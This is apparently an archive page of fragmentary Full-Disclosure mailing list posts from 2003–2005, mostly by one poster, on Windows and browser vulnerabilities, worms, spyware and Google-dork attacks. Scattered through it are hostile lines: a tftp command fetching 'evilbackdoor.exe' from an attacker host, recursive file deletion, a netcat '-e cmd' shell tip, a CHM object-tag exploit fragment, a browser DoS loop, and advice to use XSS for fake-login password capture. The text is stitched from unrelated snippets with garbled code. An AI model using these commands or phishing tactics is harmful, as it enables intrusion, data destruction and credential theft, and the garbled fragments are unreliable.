the NDA was with a private vendor
what they do with my info is their business
On Fri, 2005-02-18 at 14:57, morning_wood wrote:
great job...
this had been discovered by myself over a year ago,
but was only released as a internal to a project
i was under an NDA when i discovered
great job...
this had been discovered by myself over a year ago,
but was only released as a internal to a project
i was under an NDA when i discovered it
cheers,
Donnie
___
Full-Disclosure - We believe in it.
Charter:
From: Gaurav Kumar [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 1:50 AM
Subject: [Full-Disclosure] google getting attacks;anybody got this? --i got
it.
google is detecting if search contains
inurl:member.php?action=viewpromember= -- myphp forum attack.
yes... too bad he cant read...
m.w
- Original Message -
From: Polarizer [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 3:05 AM
Subject: Re: [Full-Disclosure] google getting attacks; anybody got
this? --igot it.
This is nothing new. Was mentioned
while netdde is not started by default.
I did just notice netdde does run during
Windows update...
this would allow a window of opportunity
to exploit the service. a worm using the
netdde exploit could take advantage of
this before the user fully updates.
just noticing,
Donnie Werner
looks like MS is NOT publicly releasing a fix for this, while they have the
means and solution at hand.
( at least under IE )
a kind reader sent this little snippet...
... was able to get Microsoft to provide us with a DLL
to drop under IIS 6 to compare URL variable against the Host: header
- EXPL-A-2005-001 exploitlabs.com Advisory 030 -
- Microsoft Outlook Web Access -
OVERVIEW
A vulnerability in Microsoft Outlook Web Access allows
if you mean http://www.exploitlabs.com/urlbar.html ...
then I sent MS an advisory of this... they are working on a patch.
funny... i just noticed my first PoC of this is dated 08/27/04
( http://www.kb.cert.org/vuls/id/490708 ) is dated 2001 !!!
MS response #1
Thank you for sending this report.
scenario...
NAT client browses web...
NAT client initates a HTTP request to do this...
ROUTER returns the request to NAT client...
( normal activity )
attacker website exploits client browser...
exploit drops and executes badfile.exe
badfile.exe hooks iexplore.exe...
badfile.exe is 'reverse
I don't have the time to investigate the cgi and dc binaries.
The cgi at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.
cgi
1495 1495 0 /dev/tty
149E 149E 0 socket
14AA 14AA
The relevant code:
-
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n900;$n += 10){
$sock = IO::Socket::INET-new(PeerAddr = www.google.com.br, PeerPort =
80, Proto = tcp) or next;
print $sock GET /search?q=$procurastart=$n HTTP/1.0\n\n;
nothing new here...
unless... we try the L337
hhctrl.ocx is not installed by default in all SP1s but is on all SP2.
Therefore when the exploit page tries to create the object he cannot
find it so it tries to install it. On SP2 it exists by default therefore
created silently.
i replied to this because of this statement by the O.P..
Any
i think there is many like this
http://g.msn.com/0AD00014/?http://google.com
http://g.msn.com/0AD00014/?http://example.com
etc etc etc
your examples actually use an on-site URL redir
and i recall some from yahoo as well used extensivly for spam
im quite sure they ( AOL ) knows about this , and is
even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- / snip / --
var big_string = double me up!;
while (true)
{
big_string = big_string + big_string; // 20
quite commom, funny because xss can be used in PHISHING attacks.
instead of alert blah try some html redirects to a hosted site with a fake
login
spoofing the original content ( a login page ) and capture username/password
then pass them to the real login page.
or better yet... xss dos attacks,
Below are some examples of what an actual Santy search request would
look like:
http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22btnG=Search
If their refusal to release that mail even after their customer is dead is
an indication as to their privacy practices, three cheers for Yahoo.
Don't you get the whole slippery slope thing? If it's ok when you're
dead (which it's not, my stuff is my stuff...destroy it when you're sure
I've
I can confirm on WinXP SP1 ( download the [patch].exe run and reboot)
Mr Wever's exploit PoC did not run ( no shell, dialog warning )
cheers,
m.w
The IFRAME vulnerability has been patched, see
http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx
The wording in ms04-040 is so
http://sourceforge.net/projects/showtraf
showtraf.
i use this everyday, its free, easy, simple, and small ( 1 file ).
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
.. molded cdroms..
( i assume you mean pressed cdroms like MsWindows or Doom3 that you buy)
do you even know how they are made?!?
.. you cant burn more data on a molded cdrom, as the
reflective layer is not only not burnable, but never was burnt to begin
with.
but thanks for playing!!!
mabey a
then there was this little diddy...
HYDERABAD: The hacker is on the prowl and the government can do little to
stop him in his tracks. At least, that's what the IT department - custodian
of the government web sites and servers ...
http://timesofindia.indiatimes.com/articleshow/320561.cms
cheers,
oh?
-
08/23/2001 05:00 AM 354,468 wmpaud1.wav
( bintext output )
00056862 00056862 0 INFOICRD
0005686E 0005686E 0 2000-04-06
00056882 00056882 0 Deepz0ne
00056894 00056894 0 Sound Forge 4.5
-
..heh
Guys,
For your pleasure:
file is a MSVB exe, here are some fun strings from the binary...
( spyware, but not a trojan )
http://www.maxmind.com:8010/a?l=PeAyF1sgrZYwi=\tempf.txt
\usta32.ini
http://mmm.media-motor.net/bundle.php?aff=\affbun.txt
phases
sewers
outers
c:\asdf.txt
randomdll
mydll
randomocx
\regsvr32 /s
bindshell success ( html run from local )
connect from remote success...
this is NASTY
if shellcode modified this will do reverse or exe drop i assume
good work,
Donnie Werner
___
Full-Disclosure - We believe in it.
Charter:
Obviously not many of you Americans ( which I am )
travel to Europe much do you.
You fail to see, and therefore cannot comprehend the attitude of many
Europeans
about the attitudes of the American government ( f*cking with other parts of
the
world ) for peace and freedom when it is about
there is a [x] box..
Don't ask for my password for 2 weeks.
this sets the users cookie. Gmail uses the cookie for authentication.
XSS holes are not (as we all know) an immediate bypass for
any authentication.
right
It can be used, with a bit of work, to steal
cookies/authentication data
phood 4 th0ugh7,
last i heard being on the internet was voluntary...
( whether you are a person or business enity
and many successfull business have no internet presence )
if i am correct... being on the the internet is not manditory to
conduct life sustaining activities...
( eat, shit, sleep [
a malicious user who has already gained a command shell to activate
umm... you already own the box.
try...
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )
or
c:\del *.exe /s
c:\shutdown -r
I realy do not see the SECURITY ISSUE here.
cheers,
m.wood
umm, no
all this has thats different is correct headers for bind or remote shell
option.
and ability to set ports and return ip in the code, instead of needing to
use your own shellcode ( or metasploits ) note: there is no new exploit code
or vector
--- / snip /-
Ron, PLEASE STFU KTHNX ( you too Larry S. )
Who the f*ck cares, they hired him, if you dont like the company, dont
patronize them for business.
But please shutthefuckup. Why?
1. You have nothing to contribute.
2. you bitch and moan about things that are truly insignifigant.
3. you are a Media
reverse successfull...
m.wood
Game over...
So the exploit is out that will open a local command prompt on the
machine exploiting the GDI library..
This thing allows 2500 bytes of shellcode..
How long before this turns nasty?
Seems easy to me to make it reverse shell...
guess they shouldnt have publicized it. ( who cares )
@stake / Symantec - business is business, Symantec is aquiring not only
tools and expertise,
but possibly more importantly a broader, richer client base. ( again, who
cares )
I do however find this interesting... the below suggests that a
password issues known to exist..
http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit
http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability
or...
http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10
object data=http://www.v%69k%6F%72d.com/default.htm;brbr
this is a data tag .chm exploit
[textarea id=code style=display:none;]
[object
data=#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm type=text/x-scriptlet][/object]
[/textarea]
[script
password issues known to exist..
http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit
http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability
or...
http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10
your serious??
this issue has been arround for about 10 years...
try googling ws_ftp.ini where you can simply drop the
ini in your ws_ftp folder, convert the hashes or import into your
favorite ftp client that supports ws_ftp.ini style format.
m.wood
- Original Message -
From: Gaurang
wgte frauder.us/linux/ssh.tgz
http://frauder.us serves up putty.exe ( v 0.54 ) on connect
as frauder, no extension. Proally not your average admin
tool setup...
m.wood
___
Full-Disclosure - We believe in it.
Charter:
i am qurious if a regedit setting exist in order to alter the user agent of
the browser
and to conseal info.
under windows...
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\User Agent\Post Platform
use anything... ( including javascript [hinthint] )
m.wood
it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.
the same effect can be accomplished here...
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- snip --
Such memory protection systems
Since that time I have seen sensationalist TV shows showing how FBI and
CIA
operatives get stuff out written to a sector BEFORE the sector was
overwritten and I honestly cannot understand how that could be, if at all
possible. Am I right in thinking those shows are bull?
simple...
by
http://exploit.wox.org/babelpr0x.html
try babelfish?
m.wood
http://exploit.wox.org/tools/googleproxy.html
But with that (it is only the google translator), you aren't anonymous,
because the images and other files aren't translated, and they are loaded
directly from the server.
rofl, are you sure your not Bipin ?
Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability
in all web servers.
File Source disclosure vulnerability in all web servers.
Remote explotation of this issue can be achived by clicking with the
right button into the website
- EXPL-A-2004-002 exploitlabs.com Advisory 028 -
- Surgemail -
OVERVIEW
SurgeMail is a next generation Mail Server -
Combining
http://www.f-secure.com/v-descs/wallon.shtml
Last week on the site of 'The Register' an article was published about
spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not
release any information about the zero-day issue, so perhaps anyone on the
list knows anything
I have the following queries
1. Would an exploit like this be said to be severe?
yes
2. Is the vendor right in their approach to this issue?
not entirely
3. How do I make public the vulnerability? (Vendor has given permission for
the same)
post it here, on your site, or another security
Zone-h.org reports..
A Portuguese group dubbed Outlaw group has defaced the Microsoft.com web
site, the hacked page (www.microsoft.com/mspress/uk/) isn't available anymore
since 9:00pm GMT
read more...
http://zone-h.org/en/news/read/id=4251/
m.wood
: Thursday, May 20, 2004 12:44 PM
To: morning_wood; 0day; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
in ActivePerl ?
I haven't tested it yet but this also probably means that the msi/Microsoft
service compilor in the Activeperl Developer's Kit
binaries created via perl2exe also are affected.
C:\type 1.pl
#
$a=A x 256; system($a);
C:\perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at
and we seem to get control of EIP. Coincidence? Try yet two more:
C:\perl -e $a=A x 261; system($a)
C:\perl -V
Characteristics of this binary (from libperl):
Compile-time options: MULTIPLICITY USE_ITHREADS PERL_IMPLICIT_
LICIT_SYS
Locally applied patches:
ActivePerl Build 635
Can anybody reproduce this?
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\perl -e $a=A x 256; system($a)
'AAA
Sasser violates poorly designed/implemented network infrastructures.
kinda like breaking into a room via a locked door, through a window in
said locked door. The door design does not impliment a proper design
infrastructure for the intended application.
Jail the mfg of the Door?? i think not.
that sure got their attention! just keep this up but after informing the isp
that if they cannot protect your network then you would have to take active
steps to protect your network which includes all the network scanning and
namapping etc
since when is it the ISP's job to protect your network
sneaker
possibly a beta version of a connect back trojan.
seems to be able to use a website to transfer information between the
attacker and the infected machine.
appredir-username=some_irc_guy
client version=sneaker_0.19
http://vil.mcafee.com/alphar.asp?char=SCRIPTalert(document.cookie);/SCRIPTS
CRIPTalert(document.cookie);/SCRIPT
D.Werner
http://nothackers.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Tamas Feher wrote...
1., First Amendment defines free speech. Source code has been proven
free speech. Executables are not covered by free speech
this statement is illogical.
what exactly makes string of characters executable ?
MZ? elf? contained in the first few bytes / bits?
please define
Hi morning wood. Aren't you the guy who ran a vulnerable demo version
of some windows ircd for your security team? Oh no maybe someday
you might be important enough to be Rosiello Jr Security Analyst.
no, i ran a personal IRCD that was attacked by the by the precursor of msblaster
(
) tal!x [EMAIL PROTECTED]'Q_ IP addrvs3
-- snip ---
based on the above, the worm / viri tries to connect to a IRC server.
anyone else experiencing this?
morning_wood
http://exploitlabs.com
___
Full-Disclosure - We
Unrelated but funny stories of rave (Jonny Mast) getting owned:
- rave gets his account backdoored on kokanin's box. He finds the obviously
Apr 24 13:25:18 rave KOKANIN UR BOX IS FUKCING HACKED AND ALL MY
STUFF IS GONE!
rofl, DTORS owned again.
hi there
From: [EMAIL PROTECTED]
ahh nevermind, it's clear neither of you have the
desire to learn
mabey they need this...
- snip -
#!/usr/bin/perl
#
# the perl of security ( gettn' a clue )
# by m.wood
#
# version 1.03
#
use CommonSense; # you do have this module...
Another question: Is there a quick way to find out which tool compressed
an executable? A tool maybe?
PEiD
http://peid.has.it/
m.wood
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter:
Browser bugs [DoS] ... where will you draw a line?
DoS bugs that cause permanent damage are treated differently, of course.
For example, I could imagine a bug that would corrupt some critical file
what about Browser bugs[DoS] a XSS vunerable site?
simple javascript leveraged against a host
executing this at the dos promt would create a zero byte m.wood file
m.wood
looks like a feature equivalent to touch m.wood or touch filename
LMFAO
m.wood
Delivered using the Free Personal Edition of Mailtraq
[EMAIL PROTECTED]:~$ more testfile.txt
Let's try this in Linux
[EMAIL PROTECTED]:~$ ls -al testfile.txt
- -rw-r--r--1 chrisusers 24 Apr 7 12:43 testfile.txt
[EMAIL PROTECTED]:~$ testfile.txttestfile.txt
- -bash: ./testfile.txt: Permission denied
[EMAIL PROTECTED]:~$ more
You can also delete files by using the del command. I tested this with the
5.1 ntos kernel (Slackware XP):
C:\del testfile.exe
if you were trying to be sarcastic in saying this is
normal, any dummy knows that then you failed
horrendously, sir.
where did the delete command came from
Fat32 file output redirect overwrites self.
===
odd behavior... ?
1.) console application output redirected to itself ( file.ext file.ext )
C:\testprogram.exe program.exe
program.exe
The process cannot access the file because it is being used by another process.
ok
Oh contraire, the first thing we do when we go onsite to work on windows box
is ask my client to reboot it first, particularly if it is a server, as
occassionally they they do not come back up, and we do not want to be blamed
just because the OS is unstable
and you claim to be a security
k-rad this is old... mmmk
possibly someone not from bbs days may not remember..
i got offline between 93-95
We present to you the second installment of our introductionary series
into the exciting world of Mostly Harmless Hacking. Hacking from Windows 95.
Copyright 1997
( recycling old zine's
well... i got mine, but funny thing..
pstrongThis CD requires that JavaScript be enabled for your Web
browser./strong /p
pIf you need help re-enabling JavaScript for your browser, a
href=http://go.microsoft.com/fwlink/?linkid=9580; target=_blankclick
here/a./p
then offers this screen...
You
Is it possible to erase data on a hard disk drive
with a powerful magnet, but then be able to use the drive and the PC again?
yes
m.wood
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
or worm or anything
else i didnt want. and i do not run any AV nor filtering
nor firwall to this box.
am i missing something here?
because i realy do not see the issue.
morning_wood
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter
every one is blabbling about some new mirc 6.14 dcc exploit. Is this true?
has any body confirmed this?
http://searchirc.com/boards/viewtopic.php?t=1115
http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=mirc+6.14+exploitbtnG=Go
ogle+Search
i like Google©
m.wood
I'd like to suggest everybody starts sending an annoying mail back to the
poster of useless crap like this AND NOT TO THE LIST.
I try to make a habit of sending n00b mail to the AV notices i recieve
as someone on this list has / does get infected, my address gets spoofed,
and mr.N00bular with
However, in this case, *I* sent the virus. I had the word t e x t . p i
f in the body of my message (without the spaces, of course), and the
poorly configured AV scanners detected a virus.
about as funny as this
( http://lists.netsys.com/pipermail/full-disclosure/2003-May/005244.html )
Hi,
How bad is it to have Win XP HOME at work - in LAN ?
I ask for security reasons - I just logged off in winxp home from
vncviewer and it said -closing all network connections ...- and my vnc
connection still remained active :)?
sometimes winXP's tcp parameters keep a connection open
buddyiframe src=http://www.malware.com/pithy.html;
so could this url be considered a phishing scam ?
regardless of your implied intent? It does pretend
to be a genuine login, and i am sure you are collecting successfull
attempts to a log ( right? ). Has your demo oversteped the bounds
of
Gimme a break..
http://go.microsoft.com/?LinkID=422101
although this could be amusing...
http://www.microsoft.com/security/protect/cd/order.asp
m.wood
___
Full-Disclosure - We believe in it.
Charter:
How can i know if there a sniffer running in my network?
When you wake up one day to find that you're 0wn3d :-)
Seriously, about the only way I can think of to detect a sniffer with
its transmit leads cut is with a Time Domain Reflectometer (TDR) and
look for an unexplained impedance
bascially looking for sync-src-1.00.tbz. That message was posted to this
avail on infected hosts
This is how I came to be in possession of it:
nc -l -p 3127 doomjuice.dump
You will probably want to write a
loop to restart netcat because it exits after a successful transfer.
Now I'm confused...
[EMAIL PROTECTED] /storage/virii] $ nc -h
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere: nc [options] hostname port [port] ...
listen for inbound:nc -l -p port [options] [hostname] [port] ...
tunnel to somewhere:
I heard that it was possible to cause irrepareable
damage to any electronic circuit through
certain waves or radio emissions ( I'm not qualified
in this subject ).
ESD
Google is my friend..
http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=esd
make him yours.
D.Werner
Many of these systems come from the vendor with default shares enabled
allowing anonymous access, no patches, default passwords, no anti-virus,
etc. Many health-care organizations then proceed to plug them into the
general network and pretend that nothing's wrong.
ahem... this is not a
NOW EVERY EXECUTABLE IS TRUSTED AND DIGITALY SIGNED
found this interesting...
\win2k\private\inet\mshtml\build\scripts\tools\x86
iexpress.exe
signcode.exe
makecert.exe ( DigSig.dll )
( in fast food voice ) and who would you like your package to be certified
from today sir?
IE6 is not vulnerable, so I guess I'll get back to work. My Warhol
worm will have to wait a bit...
Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB [EMAIL PROTECTED]
guess those sources are good for something huh
( , ubber
please enlighten us on your versions numbers / patch levels wood.
-KF
morning_wood wrote:
Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB [EMAIL PROTECTED]
Symtoms were reported using the following:
Windows XP Pro ( Gold
win2k sp4
does not work
Help Center only ships with Me, XP and Win2k3
btw.. UNCONFIRMED in Xp Pro Sp0
m.wood
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
it has been leaked , also for the winnt 4 and the windows XP sourcecode
files like : windows.2000.source.code-IND are now roaming irc channels and
webpages ... it is an hard day for microsoft i guess
I have seen these files... personaly I find it hard to belive the NT / 2k base
is bigger that
-To: moderator for [EMAIL PROTECTED]
Received: (qmail 14774 invoked from network); 10 Feb 2004 22:07:52 -
X-Originating-IP: [4.65.224.219]
X-Originating-Email: [EMAIL PROTECTED]
X-Sender: [EMAIL PROTECTED]
From: morning_wood [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED
enbiei.exe
.. yes there are 4 variants.
to get infected ( capture one ) try netcat with the -e
to call cmd.com listening on port as well... fun trick.
morning_wood
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http
feb - 2006 ???
feb - 2005 ???
http://lists.netsys.com/pipermail/full-disclosure/
sorted by date.
The Full-Disclosure Archives
You can get more information about this list or you can download the full raw
archive ( 92 MB ).
ArchiveView by:Downloadable version
2006-February:[ Thread ] [ Subject ]
been applied. We have scanned with Retina, Foundstone and Qualys tools
which they all showed as VULNERABLE, however when we scanned with Microsoft
Base Security Analyzer it showed as NOT VULNERABLE. This was at first
confusing; one would think an assessment tool released by the original
did
I noticed that the file was last modified a day that i ddin't open my pc. Is
there any change for that file to have attributes than the real one?
not uncommon for date manipulation with trojans. Beast 2.05 uses activeX
startup routines and file date manipulation of the files ( files are dated
dunno if this is new but..
http://pa.yahoo.com/*http://rd.yahoo.com/hotjbs/*http://example.com
m.wood
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
http://www.startribune.com/stories/535/4304797.html
in re-reading this article i was presented with
an offer to subscribe/signup/register to the StarTribune
when re-clicking on the above link. The redirected url is
The FBI and other police agencies may not eavesdrop on conversations inside
automobiles equipped with OnStar or similar dashboard computing systems...
http://news.com.com/2100-1029_3-5109435.html
uhhh...
Big brother is now
m. wood
http://exploitlabs.com
even under
low security settings. try again Jelmer?
morning_wood
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Your post isn't verry informative
what kind of system did you test it on? It worked on my fully patched
windows XP
WinXp Sp0 IE6 010817-1148
running http://microsoft.bbs.us/malware.html; i get only a webpage with
junkware
and no file(s) on my hd.
running malware.html locally does produce
Actualy winMe is quite safe out of the box ( its win9x ) and
does not have the remote compromises that affect winXP / win2k
Donnie Werner
E2 Labs
- Original Message -
From: j [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 6:33 AM
Subject: [Full-Disclosure]
Buddy (but mr
technician... he talks to me) for crying out loud
Donnie Werner
[EMAIL PROTECTED]
- Original Message -
From: [EMAIL PROTECTED]
To: morning_wood [EMAIL PROTECTED]
Cc: j [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 8:44 AM
Subject: Re: [Full
ever try google?
http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=eeye+objectbtnG=Google+Search
morning_wood
- Original Message -
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, November 05, 2003 2:06 PM
Subject: [Full-Disclosure] IE object vulnerability
it is a demo of the object tag exploit code, asp is server side script that
does not render in the browser, that is why you cant see it.
morning_wood
- Original Message -
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, November 04, 2003 3:09 PM
Subject: [Full
1 - 100 of 318 matches
Mail list logo